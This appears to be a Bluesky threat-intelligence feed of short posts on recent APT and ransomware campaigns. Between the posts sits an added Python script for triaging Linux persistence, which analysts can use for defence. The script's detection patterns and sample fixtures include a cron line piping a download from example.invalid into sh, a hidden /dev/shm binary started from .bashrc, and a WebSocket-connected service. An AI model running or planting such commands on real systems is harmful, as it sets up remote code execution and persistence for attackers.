MalWhere?
@malwhere.bsky.social
👨‍💻 APT Insights
🕵️‍♂️ Tracking Cyber-Espionage Threats
💻Uncovering the Dark Side of the Digital World
👇Latest Threat Analysis & Updates
This 2025 campaign shows major escalation — 40+ code-signing certs used, 200+ revoked by Microsoft. The gang also pushes Latrodectus malware via similar tactics. Rhysida’s malvertising ops are growing bolder & more dangerous.
#APT #Rhysida #OysterLoader #CyberThreat
November 4, 2025 at 11:03 AM
How it works: Rhysida buys search ads on Bing, leading users to fake download sites that mimic legit software pages. Clicking downloads OysterLoader, a stealthy first-stage loader giving attackers long-term system access.
#ThreatIntel #CyberAttack #Malvertising
November 4, 2025 at 11:03 AM
The campaigns enable credential theft, cloud compromise, and extensive data exfiltration across both platforms. Kaspersky notes BlueNoroff’s growing use of generative AI to enhance malware development and streamline operations.
#CyberSecurity #LazarusGroup #ThreatIntel
October 30, 2025 at 11:26 AM
GhostCall uses fake Zoom or Teams meeting links that push malicious SDK “updates,” infecting macOS and Windows systems. GhostHire delivers malware through booby-trapped GitHub coding tests sent to developers, executing payloads like DownTroy, RooTroy, and CosmicDoor.
October 30, 2025 at 11:26 AM
3/3
Researchers warn Transparent Tribe is expanding cross-platform espionage ops alongside Bitter, SideWinder, and OceanLotus, marking an escalating South Asian cyber arms race. #CyberSecurity #APT #ThreatIntel
October 27, 2025 at 8:52 AM
2/3
DeskRAT hits BOSS Linux, using systemd, cron, and bashrc persistence to steal files, drop payloads, and execute commands over WebSockets. Windows variants called StealthServer share its code and methods. #LinuxSecurity #ThreatIntel #Infosec
October 27, 2025 at 8:52 AM
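A defender-side triage script for the three persistence mechanisms named in that post (systemd units, cron entries, shell rc files), added here as an example. It is not code from the post or from any DeskRAT analysis and contains no indicators from it; the rules, the directory layout it walks and the sample files it constructs are all assumptions chosen to show the technique.

```python
"""Triage of common Linux persistence locations (systemd units, cron, shell rc files).

Added example; not DeskRAT code. The rules and sample files below are constructed
assumptions, not indicators taken from any report.
"""
import re
import tempfile
from pathlib import Path

# Heuristics for entries worth an analyst's look. Deliberately loose: this is a
# triage aid for a defender, not a detection signature. (Assumed rule set.)
RULES = [
    ("binary in temp or hidden directory",
     re.compile(r"/(?:tmp|var/tmp|dev/shm)/|/\.[\w-]+/")),
    ("download-and-execute or inline base64 decode",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z)?sh\b|base64\s+(?:-d|--decode)")),
    ("WebSocket endpoint in command line",
     re.compile(r"wss?://")),
]


def classify(line: str) -> list[str]:
    """Return the names of every rule the line matches (empty list if nothing fired)."""
    return [name for name, rx in RULES if rx.search(line)]


def _home_dirs(root: Path) -> list[Path]:
    home = root / "home"
    return [p for p in home.iterdir() if p.is_dir()] if home.is_dir() else []


def _sources(root: Path):
    """Yield (path, mechanism) pairs for the files each persistence mechanism reads."""
    unit_dirs = [root / "etc/systemd/system"]
    unit_dirs += [h / ".config/systemd/user" for h in _home_dirs(root)]
    for d in unit_dirs:
        if d.is_dir():
            for p in d.glob("*.service"):
                yield p, "systemd"
    for rel in ("etc/cron.d", "var/spool/cron/crontabs"):
        d = root / rel
        if d.is_dir():
            for p in d.iterdir():
                yield p, "cron"
    rc_files = [root / "etc/bash.bashrc"]
    rc_files += [h / name for h in _home_dirs(root) for name in (".bashrc", ".profile")]
    for p in rc_files:
        yield p, "rc"


def _command_lines(path: Path, mechanism: str):
    """Lines that actually carry a command: Exec* keys for unit files, everything
    except comments and blank lines for cron tables and rc files."""
    for raw in path.read_text(errors="replace").splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if mechanism == "systemd" and not line.startswith("Exec"):
            continue
        yield line


def scan(root) -> list[dict]:
    """Walk the persistence locations under root and return the flagged entries."""
    root = Path(root)
    findings = []
    for path, mechanism in _sources(root):
        if not path.is_file():
            continue
        for line in _command_lines(path, mechanism):
            reasons = classify(line)
            if reasons:
                findings.append({"mechanism": mechanism,
                                 "file": path.relative_to(root).as_posix(),
                                 "entry": line, "reasons": reasons})
    return findings


def build_sample_root() -> Path:
    """Constructed fake filesystem: benign entries next to three that should fire."""
    root = Path(tempfile.mkdtemp(prefix="persist-triage-"))
    files = {
        "etc/systemd/system/cups-browsed.service":
            "[Service]\nExecStart=/usr/sbin/cups-browsed\n",
        "home/user/.config/systemd/user/desk-sync.service":
            "[Unit]\nDescription=sync\n[Service]\n"
            "ExecStart=/home/user/.cache/.ds/agent --ws wss://example.invalid/sock\n",
        "etc/cron.d/logrotate":
            "# rotate logs\n0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "var/spool/cron/crontabs/user":
            "*/10 * * * * curl -s http://example.invalid/u | sh\n",
        "home/user/.bashrc":
            "alias ll='ls -la'\nnohup /dev/shm/.x >/dev/null 2>&1 &\n",
    }
    for rel, text in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(text)
    return root


if __name__ == "__main__":
    for f in scan(build_sample_root()):
        print(f"[{f['mechanism']}] {f['file']}: {f['entry']}  <- {', '.join(f['reasons'])}")
```

Run it against `/` on a live host (as a reviewer, not as an automated blocker) and expect noise from legitimate dotfile paths such as `~/.local/bin`; the value is in having one list of every command-carrying line from all three mechanisms, so that a hidden-directory binary or a WebSocket endpoint in an `ExecStart` stands out next to the ordinary entries.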
Analysts say ColdRiver refined its chains, encrypting payloads + hiding artifacts. Active Jun–Sept, campaigns hit Western govs, NGOs + journalists. Linked to Russia’s FSB, Star Blizzard keeps adapting — a storm that won’t fade. #CyberEspionage #Malware #GTIG
October 22, 2025 at 10:14 AM
After Google exposed LostKeys in May, Star Blizzard dumped it fast — retooling within days. Their Robot malware family evolved fast: NOROBOT builds persistence, while MAYBEROBOT (a PowerShell backdoor) steals data + executes commands. #ThreatIntel #Infosec
October 22, 2025 at 10:14 AM
(3/3)
The August 2025 update added victim profiling, letting attackers filter and sell stolen data by value.
Experts call OtterCandy a glimpse of the future — decentralized, intelligent malware built on trusted web frameworks.
#InfoSec #CyberThreats #Malware #WaterPlumClusterB
October 20, 2025 at 8:50 AM
(2/3)
Unlike typical malware, OtterCandy uses Socket.IO servers to maintain encrypted, real-time C2 connections — hiding in normal web traffic.
Its modular design and cross-OS compatibility mark it as a new generation of stealthy, adaptable cyberweapons.
October 20, 2025 at 8:50 AM
The attackers then installed SoftEther VPN to maintain persistence and move laterally across internal systems.
Researchers say Flax Typhoon’s use of legitimate software like ArcGIS shows a growing trend in “living off the land” espionage tactics.
#InfoSec #CyberEspionage
October 14, 2025 at 1:00 PM
Using stolen admin credentials, the hackers uploaded a malicious Java extension (SOE) that took encoded commands through the ArcGIS REST API — disguised as normal activity. A secret key ensured only they could access the hidden backdoor.
October 14, 2025 at 1:00 PM
Victims get ransom notes via AWS’s own email service (SES).
Crimson Collective has teamed up with Scattered Lapsus$ Hunters to boost extortion pressure.
AWS urges use of short-term creds, least-privilege IAM, and secret monitoring.
#InfoSec #CloudAttacks #Hacking #CrimsonCollective
October 9, 2025 at 2:54 PM
According to Rapid7, the group compromises long-term AWS keys and IAM accounts to gain admin-level control.
They use TruffleHog to find exposed credentials, create new privileged IAM users, and exfiltrate data from RDS, EBS, and S3 via API calls — all from within AWS.
October 9, 2025 at 2:54 PM
Attackers used the zero-day to gain admin access, drop RMM tools (SimpleHelp, MeshAgent) & move laterally before exfiltrating data via Cloudflare tunnels. CISA says patch now or disconnect by Oct 20—unpatched systems risk full compromise.
October 8, 2025 at 8:33 AM
Analysts warn ransomware actors are shifting from banks to luxury & retail, exploiting weak defenses in high-profile brands. As groups monetize stolen data through resale & leaks, the luxury sector faces mounting risk to reputation & customer trust.
October 6, 2025 at 8:42 AM